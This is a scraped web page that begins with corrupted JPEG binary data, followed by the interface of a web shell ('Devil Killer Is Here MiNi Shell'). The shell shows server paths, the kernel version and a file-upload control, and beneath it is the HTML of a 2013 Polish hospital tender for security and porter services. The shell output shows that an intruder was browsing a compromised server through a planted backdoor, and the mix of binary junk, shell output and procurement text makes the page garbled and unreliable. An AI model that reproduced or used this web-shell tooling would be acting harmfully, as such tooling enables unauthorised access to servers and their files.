JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131108/456986-N-2013.html

<p class="kh_header"><b>Złotoryja: Całodobowy dozór obiektów i obsługa portierni Wojewódzkiego Szpitala Psychiatrycznego w Złotoryi, przy ul. Szpitalnej 9</b><br>
<b>Numer ogłoszenia: 456986 - 2013; data zamieszczenia: 08.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Psychiatryczny w Złotoryi Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Szpitalna 9, 59-500 Złotoryja, woj. dolnośląskie, tel. 76 8779300, faks 76 8779330.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://wsp.szpitalna9.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Całodobowy dozór obiektów i obsługa portierni Wojewódzkiego Szpitala Psychiatrycznego w Złotoryi, przy ul. Szpitalnej 9.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem postępowania jest:
I. Obsługa portierni i całodobowy dozór obiektów Wojewódzkiego Szpitala Psychiatrycznego w Złotoryi, przy ul. Szpitalnej 9, 16 i 18;

II. Przejęcie i prowadzenie monitoringu Ośrodka Psychiatrycznej i Odwykowej Opieki Zdrowotnej w Legnicy, przy ul. Chojnowskiej 81;

III. Konserwacja i ewentualna modernizacja sieci monitoringu portierni wraz z podłączeniem do sieci LAN.

1. Zadania pracownika ochrony:

1) Dozorowanie obiektów poprzez bieżącą obserwację monitoringu Szpitala                      w Złotoryi, oraz zewnętrzny i wewnętrzny obchód obiektów w godzinach wieczornych i nocnych, oraz kontrola osób wchodzących i wychodzących;

a) Ustalanie uprawnień do przebywania osób w obiektach, lub na obszarach chronionych;

b) Wzywanie osób do opuszczenia obszaru lub obiektu, w przypadku stwierdzenia braku uprawnień do przebywania na terenie chronionego obszaru lub obiektu, albo stwierdzenia zakłócania porządku;

c) Zatrzymywanie osób stwarzających w sposób oczywisty, bezpośrednie zagrożenie dla życia lub zdrowia ludzkiego, a także dla chronionego mienia, w celu niezwłocznego wydania tych osób policji;

2) Obsługa centrali telefonicznej:

a) Odbieranie i łączenie rozmów z poszczególnymi oddziałami/działami szpitala;

b) Łączenie rozmów służbowych i ich rejestrowanie;

c) Łączenie rozmów prywatnych (za odpowiednią odpłatnością) ich rejestrowanie i comiesięczne rozliczanie się z pobieranych opłat.

3) Obsługa centrali przeciwpożarowej:

a) Sprawdzanie miejsca pożaru w przypadku włączenia się sygnału alarmowego;

b) Kontakt z Państwową Strażą Pożarną w Złotoryi w celu potwierdzenia zagrożenia, lub  przekazanie informacji o braku zagrożenia;

c) Wpisywanie zdarzenia do książki przeglądów technicznych i kontroli systemu alarmu pożarowego.

4) Wydawanie i przyjmowanie kluczy od pomieszczeń służbowych.

5) Odbieranie i rejestrowanie dostarczonych przesyłek pocztowych i kurierskich.

6) Zamykanie i otwieranie drzwi wejściowych do szpitala o wyznaczonych porach.

7) Włączanie i wyłączanie oświetlenia nocnego zewnętrznego i wewnętrznego obiektu, zgodnie z ustaleniami Zamawiającego.

8) Prowadzenie przez pracowników ewidencji wydawanych kluczy, oraz dziennika dozorów (wpisywanie raportów po każdym dyżurze).

9) Prowadzenie (wydawanie) rejestrów, ewidencji i wykazów:

a) Rejestr konsultacji internistycznych i neurologicznych;

b) Rejestr skierowań na konsultacje;

c) Wykaz osób korzystających z pralni;

d) Wykaz osób korzystających z sali rehabilitacyjnej;

e) Ewidencja wyjść pracowników;

f) Rejestr handlowy;

g) Rejestr usterek technicznych;

10) Udostępnianie pomieszczeń świetlicy, oraz sali rehabilitacyjnej, osobom korzystającym z niej po godzinach pracy, i każdorazowa kontrola jej stanu.

11) Udzielanie określonych informacji, oraz kierowanie osób zainteresowanych do odpowiednich komórek organizacyjnych szpitala.

12) Sprawdzanie stanu bezpieczeństwa obiektu i pomieszczeń, pod kątem prawidłowości zabezpieczeń.

13) Utrzymywanie bieżącej czystości w portierni i holu (30 m2), oraz w dni wolne                      od pracy (weekendy i święta) przed wejściem głównym i wejściem do Izby Przyjęć.

14) Odśnieżanie schodów przed wejściem głównym do szpitala, wejściem do Izby Przyjęć i wejściami do budynku nr 16 i 18, w dni wolne od pracy.

2. Obowiązki pracownika ochrony:

1) Bieżąca kontrola bezpieczeństwa obiektów.

2) Kontrola sprawności centrali telefonicznej.

3) Kontrola sprawności systemów monitoringu.

4) Zabezpieczanie kluczy od pomieszczeń służbowych.

5) Odbieranie i zabezpieczanie otrzymanych przesyłek pocztowych i kurierskich.

6) Informowanie odpowiednich osób o zaistniałych nieprawidłowościach, awariach, itp.

7) Odpowiedzialność za powierzony sprzęt wyposażenia portierni.

8) Przestrzeganie przepisów i regulaminów dotyczących bezpieczeństwa obiektów   i ich użytkowników.

9) Przestrzeganie ogólnych przepisów i zasad Bhp oraz P/poż.

3. Pracownikowi zabrania się:

1) Spożywania alkoholu i środków odurzających, oraz przebywania na terenie szpitala pod jego wpływem.

2) Przekazywania osobom trzecim informacji dotyczących pacjentów i pracowników

3) Zezwalania na przebywanie w portierni osób nieupoważnionych.

4) Informowania osób trzecich o przebiegu służby.

5) Prowadzenia rozmów telefonicznych w sprawach prywatnych z telefonów służbowych.

4. Wymagania dotyczące Wykonawcy:

1) Zatrudnienie pracowników z wykształceniem minimum zawodowym, na umowę o pracę, przez cały okres trwania umowy.

Pracownicy muszą: 

a) Być sprawni, dobrze zorganizowani, bezkonfliktowi, umiejący radzić sobie               w kontaktach z osobami chorymi psychicznie;

b) Posiadać umiejętność obsługi centrali telefonicznej NORTEL NETWORKS M3904;

c) Posiadać umiejętność obsługi centrali sygnalizacji pożarowej CSP-35A.

d) Zamawiający  nie  zapewnia  przeszkolenia  pracowników  ochrony  w  zakresie 		  obsługi  w/w  urządzeń.

2) Posiadanie własnej stacji monitorowania alarmów, z możliwością przyłączenia    do niej istniejących systemów alarmowych i świadczenie usług serwisowo-konserwacyjnych, dla posiadanych przez Wykonawcę systemów zabezpieczeń elektronicznych.

3) Wysyłanie patrolu interwencyjnego na żądanie Zamawiającego. 
Patrol musi stawić się na wezwanie, w czasie do 30 minut od zgłoszenia.

4) Opracowanie planu obiektu (instrukcji) w zakresie ochrony mienia.

5) Możliwość partycypowania prze Wykonawcę w rozbudowie i modernizacji w/w systemów zabezpieczeń elektronicznych.

6) Ponoszenie odpowiedzialności za szkody wynikające z niewykonania, lub nienależytego wykonania obowiązków w zakresie ochrony mienia.

7) Umundurowanie pracowników w jednolity strój służbowy.

8) Pracownicy w czasie pełnienia służby, zobowiązani są stosować się do poleceń osób wskazanych przez Zamawiającego.

9) Zapewnienie pracownikom portierni zeszytów do comiesięcznych rozliczeń rejestrowanych rozmów i niezbędne przybory biurowe (np. długopisy).

5. Zobowiązania Zamawiającego:

1) Zabezpieczenie pracowników w narzędzia i środki czystości potrzebne do pracy.

2) Zapewnienie pracownikom pisemnych informacji, dotyczących funkcjonowania szpitala (nr tel., wykazy, rejestry).

3) Zapewnienie stałego dostępu do wody, energii elektrycznej i sanitariatu.

4) Zapewnienie miejsca pracy, zgodnego z przepisami bhp i p/poż.

5) Informowanie Wykonawcy o sytuacjach powodujących ryzyko powstania szkody i zakłóceniach funkcjonowania szpitala.

Zamawiający zastrzega sobie prawo do nadzorowania pracowników pełniących służbę i występowania z wnioskami o zmianę zatrudnionego personelu.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielania zamówień uzupełniających w wysokości 30% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 98.34.11.40-8, 79.71.00.00-4, 64.21.42.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Kwota i termin wniesienia wadium:

a) oferta musi być zabezpieczona wadium w wysokości 10.000 zł (sł: dziesięć tysięcy złotych).

b) wadium musi obejmować cały okres związania ofertą, także wówczas, gdy termin składania ofert zostanie przedłużony.

c) termin wniesienia wadium upływa wraz z terminem składania ofert, o godzinie wyznaczonej na składanie ofert, tj. 3 grudnia 2013r. o godz. 13:00

d) Wykonawca, który nie wniesie wadium w wymaganym terminie, w tym również               na przedłużony okres związania ofertą, lub nie zgodzi się na przedłużenie             terminu związania ofertą w sytuacjach wskazanych w ustawie, zostanie przez Zamawiającego wykluczony z ubiegania się o udzielenie zamówienia publicznego.

2. Forma i miejsce złożenia wadium:

a) w pieniądzu na konto Zamawiającego: PKO BP 96 1020 3017 0000 2902 0019 9877

b) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;

c) w gwarancjach bankowych;

d) w gwarancjach ubezpieczeniowych;

e) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5, pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).

Wadium wniesione w formach wymienionych w pkt. b-e musi być wystawione na  Wojewódzki Szpital Psychiatryczny w Złotoryi. Oryginał dokumentu (dotyczy form ppkt. b-e) potwierdzającego pokrycie wadium, musi być złożony w siedzibie Zamawiającego w pokoju nr 21 Księgowość - Kasa Zamawiającego.

UWAGA: W przypadku wadium wnoszonego w pieniądzu, Zamawiający uzna za dotrzymany termin jego wniesienia, datę uznania rachunku Zamawiającego (datę wpływu na konto zamawiającego - do godz. 13:00 do terminu składania ofert, a nie datę dokonania polecenia przelewu).

3. Wykonawca, którego oferta zostanie wybrana, traci wadium wraz z odsetkami na rzecz Zamawiającego w przypadkach przewidzianych prawem, gdy:

a) odmówi podpisania umowy na warunkach określonych w ofercie;

b) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;

c) w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 PZP lub pełnomocnictw, chyba, że udowodni, że okoliczność ta wynika z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Aktualny odpis z właściwego rejestru, albo aktualne zaświadczenie o wpisie              do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej,  wystawionego nie wcześniej niż 6 miesięcy, przed upływem terminu składania wniosków,                  o dopuszczenie do udziału w postępowaniu, o udzielenie zamówienia albo składania ofert.
Zamawiający zweryfikuje spełnianie warunku metodą: spełnia / nie spełnia;

2. Aktualna koncesja Ministerstwa Spraw Wewnętrznych, na prowadzenie działalności w zakresie ochrony osób i mienia na obszarze, którego dotyczy przedmiotowe zamówienie, w zakresie niezbędnym do wykazania spełniania warunku posiadania uprawnień do wykonania zamówienia.
Zamawiający zweryfikuje spełnianie warunku metodą: spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, minimum trzech głównych usług w okresie ostatnich trzech lat, przed upływem terminu składania ofert, albo wniosków o dopuszczenie do udziału  w  postępowaniu, a  jeżeli  okres  prowadzenia  działalności  jest  krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dokumentów potwierdzających, że te usługi zostały wykonane lub są wykonywane należycie.
Pod pojęciem głównych usług, Zamawiający rozumie usługi realizowane w wymaganym czasie, przez okres minimum 12 miesięcy każda, polegające                na dozorowaniu obiektów, z czego minimum 1 usługa  na obiektach szpitalnych.
Zamawiający zweryfikuje spełnianie warunku metodą: spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego, oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych, lub Kasy Rolniczego Ubezpieczenia Społecznego, potwierdzających odpowiednio, że Wykonawca               nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia lub składania ofert.
Zamawiający zweryfikuje spełnianie warunku metodą: spełnia / nie spełnia;

2. Opłacona polisa, a w przypadku jej braku, inny dokument potwierdzający,                    że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej, w zakresie prowadzonej działalności związanej z przedmiotem zamówienia i posiadanego mienia, z sumą ubezpieczenia 1.000.000,00 zł., na jedno i na wszystkie zdarzenia w okresie ubezpieczenia.
Zamawiający zweryfikuje spełnianie warunku metodą spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany formularz ofertowy.
2. Wypełnione i podpisane oświadczenie o związaniu ofertą.
3. Wypełniony i podpisany wzór umowy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Wysokość odpisu na PFRON - 40</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> wsp.szpitalna9.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Psychiatryczny w Złotoryi SP ZOZ
ul. Szpitalna 9
59-500 Złotoryja.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.12.2013 godzina 13:00, miejsce: Sala Klubowa
Wojewódzki Szpital Psychiatryczny w Złotoryi SP ZOZ
ul. Szpitalna 9
59-500 Złotoryja.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





